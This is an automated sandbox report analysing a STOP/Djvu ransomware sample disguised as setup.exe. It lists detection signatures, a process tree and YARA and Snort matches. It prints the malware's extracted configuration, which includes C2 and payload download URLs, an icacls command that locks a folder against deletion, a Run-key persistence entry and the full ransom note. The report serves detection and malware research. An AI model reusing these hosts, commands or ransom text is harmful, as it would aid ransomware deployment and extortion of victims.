Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1484407
MD5:13fd90197ba55324bd01b9fa97f5295a
SHA1:313ac91a6ea6e75c0fe75f65d1254905491b59f6
SHA256:be65a8d884dbb5c292c2ae94591cc6c86909bcd7ddb42588932afaf9ce15728e
Tags:exe
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • setup.exe (PID: 3604 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 13FD90197BA55324BD01B9FA97F5295A)
    • setup.exe (PID: 6316 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 13FD90197BA55324BD01B9FA97F5295A)
      • icacls.exe (PID: 2836 cmdline: icacls "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • setup.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTask MD5: 13FD90197BA55324BD01B9FA97F5295A)
        • setup.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTask MD5: 13FD90197BA55324BD01B9FA97F5295A)
  • setup.exe (PID: 3500 cmdline: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe --Task MD5: 13FD90197BA55324BD01B9FA97F5295A)
  • setup.exe (PID: 964 cmdline: "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart MD5: 13FD90197BA55324BD01B9FA97F5295A)
  • setup.exe (PID: 5252 cmdline: "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart MD5: 13FD90197BA55324BD01B9FA97F5295A)
    • setup.exe (PID: 4232 cmdline: "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart MD5: 13FD90197BA55324BD01B9FA97F5295A)
  • setup.exe (PID: 2012 cmdline: "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart MD5: 13FD90197BA55324BD01B9FA97F5295A)
  • setup.exe (PID: 6416 cmdline: "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart MD5: 13FD90197BA55324BD01B9FA97F5295A)
    • setup.exe (PID: 3816 cmdline: "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart MD5: 13FD90197BA55324BD01B9FA97F5295A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
{"Download URLs": ["http://uaery.top/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-zUVSNg4KRZ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0663Iopd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\\/Cl5VAPHD7s0flHV9k4\\\\nKbqAfRUsAP\\/a+Qe\\/oq+LZX013wQniPGx0w0JvBWmz9qtyTu0zJNXyQ8aZ3Q6rdhT\\\\nE0uDxuPIxeKCH3GF0iG6eflR3AJ6XvWbJooZ2YYmeSUdrHtW8axIKJEZwcVbli6Q\\\\nk+mieKINfHpYwbJTRcG269pLVWTQEJhjjx\\/VVRVS4ocsbmtBxpiO0NbOlqlumXab\\\\ns2SHWSS8YPLvxa4Ivm1BGfOLlf\\/0U4xXuuXJq0z1IZQmA98sv4OY9IhPe9U0bAf9\\\\nyuVIh3kP9aikZFiBOTH0iPpt98vkPpMFzOunx42BZuweF67t6AYdVP\\/NEVR\\/nPyb\\\\nUwIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2088895615.0000000001F3C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2127962943.000000000064A000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000B.00000002.2245296367.0000000000816000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    Click to see the 36 entries
    SourceRuleDescriptionAuthorStrings
    7.2.setup.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      7.2.setup.exe.400000.0.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
      7.2.setup.exe.400000.0.raw.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
      • 0xffe88:$x1: C:\SystemID\PersonalID.txt
      • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0x1002ec:$s1: " --AutoStart
      • 0x100300:$s1: " --AutoStart
      • 0x103f48:$s2: --ForNetRes
      • 0x103f10:$s3: --Admin
      • 0x104390:$s4: %username%
      • 0x1044b4:$s5: ?pid=
      • 0x1044c0:$s6: &first=true
      • 0x1044d8:$s6: &first=false
      • 0x1003f4:$s7: delself.bat
      • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
      11.2.setup.exe.20d15a0.1.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        11.2.setup.exe.20d15a0.1.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        Click to see the 43 entries

        System Summary

        barindex
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\setup.exe, ProcessId: 6316, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
        No Snort rule has matched
        Timestamp:2024-07-30T01:04:58.840639+0200
        SID:2803274
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-30T01:04:43.042605+0200
        SID:2036334
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-30T01:04:43.030191+0200
        SID:2036333
        Source Port:49714
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-30T01:04:39.500844+0200
        SID:2803274
        Source Port:49711
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-30T01:04:53.589483+0200
        SID:2803274
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-30T01:04:41.956344+0200
        SID:2803274
        Source Port:49712
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-30T01:04:55.448593+0200
        SID:2022930
        Source Port:443
        Destination Port:49719
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-30T01:04:53.678432+0200
        SID:2803274
        Source Port:49718
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-30T01:04:48.323516+0200
        SID:2803274
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-07-30T01:05:29.544243+0200
        SID:2022930
        Source Port:443
        Destination Port:56827
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-30T01:05:01.545920+0200
        SID:2803274
        Source Port:49724
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://zexeq.com/test2/get.phperAvira URL Cloud: Label: malware
        Source: http://zexeq.com/files/1/build3.exe$runpayinstall010921_delay_800_sec.exe2EEAvira URL Cloud: Label: malware
        Source: http://zexeq.com/files/1/build3.exe$runAvira URL Cloud: Label: malware
        Source: http://zexeq.com/files/1/build3.exe$runpayinstall010921_delay_800_sec.exe2Avira URL Cloud: Label: malware
        Source: http://zexeq.com/files/1/build3.exe9Avira URL Cloud: Label: malware
        Source: http://zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=trueLAvira URL Cloud: Label: malware
        Source: http://zexeq.com/files/1/build3.exeAvira URL Cloud: Label: malware
        Source: http://zexeq.com/test2/get.phpAvira URL Cloud: Label: malware
        Source: http://zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=trueaAvira URL Cloud: Label: malware
        Source: 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-zUVSNg4KRZ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0663Iopd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\
        Source: setup.exeReversingLabs: Detection: 89%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: setup.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040E870
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,2_2_0040EA51
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040EAA0
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,2_2_0040EC68
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00410FC0
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,2_2_00411178
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,7_2_0040E870
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,7_2_0040EAA0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,7_2_00410FC0
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_00411178 CryptDestroyHash,CryptReleaseContext,7_2_00411178
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040EA51 CryptDestroyHash,CryptReleaseContext,7_2_0040EA51
        Source: C:\Users\user\Desktop\setup.exeCode function: 7_2_0040EC68 CryptDestroyHash,CryptReleaseContext,7_2_0040EC68
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG7_2_00419E70
        Source: setup.exeBinary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG

        Compliance

        barindex
        Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 2.2.setup.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 7.2.setup.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeUnpacked PE file: 12.2.setup.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeUnpacked PE file: 17.2.setup.exe.400000.0.unpack
        Source: setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\_readme.txtJump to behavior
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: setup.exe, 00000007.00000003.2625881641.000000000359D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2626017307.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2461993302.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qapo source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\3.exeN source: setup.exe, 00000007.00000003.2627156422.0000000003167000.00000004.00000020.00020000.00000000.sdmp
